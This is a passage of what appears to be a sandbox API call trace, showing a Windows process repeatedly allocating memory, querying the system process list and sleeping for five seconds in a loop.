returned 0x0 [0271.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.331] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.447] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 